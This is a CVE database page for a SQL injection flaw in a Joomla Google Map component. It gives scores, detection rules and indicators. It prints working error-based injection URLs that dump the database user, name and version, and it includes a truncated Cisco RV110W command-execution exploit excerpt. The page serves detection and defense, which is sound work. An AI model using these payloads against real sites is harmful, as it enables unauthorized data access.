CVE-2018-6396
published 2018-02-17CVE-2018-6396: SQL Injection exists in the Google Map Landkarten through 4.2.3 component for Joomla! via the cid or id parameter in a layout=form_markers action, or the map…
PriorityP271critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
23.97%
97.6th percentile
SQL Injection exists in the Google Map Landkarten through 4.2.3 component for Joomla! via the cid or id parameter in a layout=form_markers action, or the map parameter in a layout=default action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| google_map_landkarten_project | google_map_landkarten | <= 4.2.3 | — |
Detection & IOCsextracted from sources · hover to see the quote
urlindex.php?option=com_gmap&view=gm_markers&tmpl=component&layout=form_markers&cid=1' AND (SELECT 6142 FROM(SELECT COUNT(*),CONCAT(0x494853414e2053454e43414e,(SELECT (ELT(6142=6142,1))),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ptYA&id=1&format=raw↗
urlindex.php?option=com_gmap&view=gm_markers&tmpl=component&layout=form_markers&cid=1&id=1+AND+EXTRACTVALUE(4855,CONCAT(0x5c,(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA),(SELECT+(ELT(4855=4855,1))),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())))&format=raw↗
- →Detect SQLi attempts against the com_gmap Joomla component by monitoring requests containing 'option=com_gmap' combined with 'layout=form_markers' and SQL payloads in the 'cid' or 'id' parameters (e.g. single-quote, AND, SELECT, EXTRACTVALUE, CONCAT keywords). ↗
- →Also monitor requests with 'option=com_gmap' and 'layout=default' for SQL injection payloads in the 'map' parameter. ↗
- →Error-based SQLi technique observed: FLOOR(RAND(0)*2) with GROUP BY on INFORMATION_SCHEMA.PLUGINS triggers a '1062 Duplicate entry' MySQL error — monitor web server/application logs for this error string as evidence of successful exploitation. ↗
- →XPATH error-based SQLi technique observed: EXTRACTVALUE() with CONCAT(0x5c,...) triggers a '1105 XPATH syntax error' — monitor application/DB logs for this error string as evidence of active exploitation. ↗
- →The exploit uses 'view=gm_markers&tmpl=component&format=raw' in the request — this combination is specific to the vulnerable code path and can be used as a high-fidelity filter in WAF or SIEM rules. ↗
- ·The exploit URLs use 'localhost' as the target host — in real-world detections, replace with the actual target hostname/IP. The SQL payloads and parameter names (cid, id, map) are the stable, host-independent indicators. ↗
- ·Vulnerability affects Google Map Landkarten versions up to and including 4.2.3 for Joomla!. Installations running version 4.2.3 or earlier should be treated as unpatched. ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Cisco RV110W - Password Disclosure / Command Execution
exploitdb·2018-12-14·CVSS 10.0
CVE-2015-6396 [CRITICAL] Cisco RV110W - Password Disclosure / Command Execution
Cisco RV110W - Password Disclosure / Command Execution
---
#!/usr/bin/env python2
#####
## Cisco RV110W Password Disclosure and OS Command Execute.
### Tested on version: 1.1.0.9 (maybe useable on 1.2.0.9 and later.)
# Exploit Title: Cisco RV110W Password Disclosure and OS Command Execute
# Date: 2018-08
# Exploit Author: RySh
# Vendor Homepage: https://www.cisco.com/
# Version: 1.1.0.9
# Tested on: RV110W 1.1.0.9
# CVE : CVE-2014-0683, CVE-2015-6396
import os
import sys
import re
import urllib
import urllib2
import getopt
import json
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
###
# Usage: ./{script_name} 192.168.1.1 443 "reboot"
###
if __name__ == "__main__":
IP = argv[1]
PORT = argv[2]
CMD = argv[3]
# Get session key, Just access index page.
u
Exploit-DB
Joomla! Component Google Map Landkarten 4.2.3 - SQL Injection
exploitdb·2018-02-16·CVSS 9.8
CVE-2018-6396 [CRITICAL] Joomla! Component Google Map Landkarten 4.2.3 - SQL Injection
Joomla! Component Google Map Landkarten 4.2.3 - SQL Injection
---
# # # #
# Exploit Title: Joomla! Component Google Map Landkarten cmslitedoct'
http://localhost/Joomla375/index.php?option=com_gmap&view=gm_markers&tmpl=component&layout=form_markers&cid=1' AND (SELECT 6142 FROM(SELECT COUNT(*),CONCAT(0x494853414e2053454e43414e,(SELECT (ELT(6142=6142,1))),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ptYA&id=1&format=raw
1062 Duplicate entry 'IHSAN SENCAN1root@localhost : joomla375 : 10.1.21-MariaDB1' for key 'group_key'
http://localhost/Joomla375/index.php?option=com_gmap&view=gm_markers&tmpl=component&layout=form_markers&cid=1&id=1+AND+EXTRACTVALUE(4855,CONCAT(0x5c,(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)
No writeups or analysis indexed.
2018-02-17
Published